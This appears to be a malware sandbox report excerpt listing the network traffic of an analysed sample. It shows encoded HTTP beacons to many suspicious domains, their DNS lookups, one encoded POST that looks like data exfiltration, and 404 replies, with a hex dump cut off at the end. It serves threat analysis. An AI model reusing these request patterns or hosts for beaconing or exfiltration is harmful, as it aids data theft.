            Source: global trafficHTTP traffic detected: GET /hkgx/?2O=wgVoJ8uM9T0/Zez11uxn+VRLTSqblAamGOKD8PxxFFLfP5o8U05sZY2pknTlSn+/tcq1eo8k+yVAgRwnrxxUqTNM4+b8NMxfCgVpsHr1kyIADa2UTEjwUtE=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.xcvbj.asiaUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /31pt/?2O=TMDpBYanOquY9Rx47rOd3KwxNkoHefYhv73C9/MKdrwqjZcj4ORMyeHFBityLVio1oCUCVJYl2rwHayMePC/S1ZjuitrANQdk8OOJhWAxEqHZ6TqwRsh8gk=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.yc791022.asiaUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /p3j6/?2O=OVR2CF7p+NAClGW2S0P2PNgTjoCVCaKiV2x0cNqPuUjpn/Qhs1nMs1l1ZXuPw6NSEK+YKob7dwv93+8G93LPPXy+SQSX5+Y6iKJbGa1Xxz7I+GHh/5eIgvw=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.43kdd.topUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /hxi5/?2O=/xN+QifpSgLb8oJax+YyM6tUBGB4yp//ixYmgFld7FWiq7hEgfqLv69cCSKy7O4D9GLUZYEuvgkAAG4+HQzEHPV07OBsdCtve3vh4iUoSVc6KmBMx1Jirj8=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.jcsa.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /j8pv/?ChhG6=J-xs&2O=JIuj9wxSnK6mEyWE+aiov6ee/jFUGAOavn5HAjA8ht24L6v+vQ9uqWj6ig59Dwg+VmGSo2u3Iy71OFL1070b+iEHSPgDI61AbnX1cIuegQgrBk3SzXJVVb4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.1secondlending.oneUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /swhs/?2O=8xf1FTtyUpYkrTYMR7SiSpjuEkVK44/qllrz0dKQmws7hy/+lCnqv8AjCvT/8dHN8wn+YkpcLfbwvxo0J0bTV1ZiQxCgHPOqTWlPXofsQEz+qrXGThT4v9Q=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.zkdamdjj.shopUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /8gp4/?ChhG6=J-xs&2O=FEeZWlhMd48ysDs1jEeP275omfikUvcs8a8x1+EEc0Vq+hoQB7y77Hco5oow9pdvGKqyyoz5OAo+pUm014OHBVCBJUJYyAljBpTR8DkbNSdXd83JJSpVoa4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.rgenerousrs.storeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /cpit/?2O=sqrCCcTnmzrg1P4sAk/QU75pr5UiXpEX3HrYYQRUrHENwAM+UA+gtHvn9s/6e57/pGZInJKN/XxZ2ntAsziA3/X4179OogJSAfxe5UAmetVNY4oSlmiuZpQ=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.bpgroup.siteUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /fev0/?ChhG6=J-xs&2O=ZsYTLU62Pg4Ji1Y4s61CDYlnLyOe/AQTsxMfn/Xy/YyeGOVtNzq5pk+0tbrPVR8P9zBOlb50dZZ9z8YaOITKi+mT6s78g50JMD8l1vaIe5uutk/kbfnPw4g= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.thaor56.onlineUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /98j3/?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.optimismbank.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /r3zg/?ChhG6=J-xs&2O=du4jOMLkh7fLnmDtVoK+d8rG/j+33GGjaV3EKcXkS3D/yxi6pio40SubWtKrR6Fw1AeDGXhTcKeneAqCGOT0/aNCu6YrtTGBPMZlno0p/0xRAVz3vwpdvYc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.greenthub.lifeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GETData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uf7y/?2O=X8Xx4Xb3zOwIp/YkPeQkR0guwoAt7ELtmVzPPBr+rNKRcobOh5vjSVYUxnTRN3k+HcX7svN7WZWipHk078Y7lpE6s8+6fnJkBTwA9zJT+z2YULyhD3K67+Y=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.bankseedz.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /3iym/?2O=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.madhf.techUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /hkgx/?2O=wgVoJ8uM9T0/Zez11uxn+VRLTSqblAamGOKD8PxxFFLfP5o8U05sZY2pknTlSn+/tcq1eo8k+yVAgRwnrxxUqTNM4+b8NMxfCgVpsHr1kyIADa2UTEjwUtE=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.xcvbj.asiaUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /31pt/?2O=TMDpBYanOquY9Rx47rOd3KwxNkoHefYhv73C9/MKdrwqjZcj4ORMyeHFBityLVio1oCUCVJYl2rwHayMePC/S1ZjuitrANQdk8OOJhWAxEqHZ6TqwRsh8gk=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.yc791022.asiaUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /p3j6/?2O=OVR2CF7p+NAClGW2S0P2PNgTjoCVCaKiV2x0cNqPuUjpn/Qhs1nMs1l1ZXuPw6NSEK+YKob7dwv93+8G93LPPXy+SQSX5+Y6iKJbGa1Xxz7I+GHh/5eIgvw=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.43kdd.topUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: babalharra.com.au
            Source: global trafficDNS traffic detected: DNS query: www.thaor56.online
            Source: global trafficDNS traffic detected: DNS query: www.optimismbank.xyz
            Source: global trafficDNS traffic detected: DNS query: www.greenthub.life
            Source: global trafficDNS traffic detected: DNS query: www.laohub10.net
            Source: global trafficDNS traffic detected: DNS query: www.bankseedz.info
            Source: global trafficDNS traffic detected: DNS query: www.madhf.tech
            Source: global trafficDNS traffic detected: DNS query: www.xcvbj.asia
            Source: global trafficDNS traffic detected: DNS query: www.yc791022.asia
            Source: global trafficDNS traffic detected: DNS query: www.43kdd.top
            Source: global trafficDNS traffic detected: DNS query: www.jcsa.info
            Source: global trafficDNS traffic detected: DNS query: www.1secondlending.one
            Source: global trafficDNS traffic detected: DNS query: www.zkdamdjj.shop
            Source: global trafficDNS traffic detected: DNS query: www.rgenerousrs.store
            Source: global trafficDNS traffic detected: DNS query: www.bpgroup.site
            Source: global trafficDNS traffic detected: DNS query: www.aballanet.cat
            Source: global trafficDNS traffic detected: DNS query: www.remedies.pro
            Source: unknownHTTP traffic detected: POST /98j3/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 199Connection: closeHost: www.optimismbank.xyzOrigin: http://www.optimismbank.xyzReferer: http://www.optimismbank.xyz/98j3/User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36Data Raw: 32 4f 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 5a 74 78 75 65 35 57 6d 69 48 55 59 31 75 53 2b 47 31 6f 4a 62 6f 35 2f 54 32 4f 5a 46 2f 7a 48 58 6c 63 4b 41 64 45 52 49 6a 50 4a 75 62 46 61 65 4e 6e 64 30 59 79 64 34 57 79 76 48 62 4f 42 62 59 64 79 64 66 4c 45 50 49 62 6b 54 4b 4e 52 4f 54 6f 76 75 59 68 75 4a 41 49 75 31 5a 30 59 48 37 67 42 58 63 43 42 42 4f 61 49 34 67 6b 32 47 62 34 76 48 33 6c 36 51 46 4d 67 41 62 66 43 58 55 6e 45 5a 31 35 51 74 39 6b 51 6e 2b 48 70 6f 42 77 4d 6f 31 4d 6c 4a 65 71 75 76 56 76 4c 55 58 58 66 78 47 66 4b 67 72 6f 45 4b 79 4e 77 78 64 65 4a 4f 41 3d 3d Data Ascii: 2O=uqdCK+O/4KmQZtxue5WmiHUY1uS+G1oJbo5/T2OZF/zHXlcKAdERIjPJubFaeNnd0Yyd4WyvHbOBbYdydfLEPIbkTKNROTovuYhuJAIu1Z0YH7gBXcCBBOaI4gk2Gb4vH3l6QFMgAbfCXUnEZ15Qt9kQn+HpoBwMo1MlJequvVvLUXXfxGfKgroEKyNwxdeJOA==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 03 Dec 2024 17:54:55 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 17:55:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 17:55:27 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 17:55:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 17:55:32 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 03 Dec 2024 17:55:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 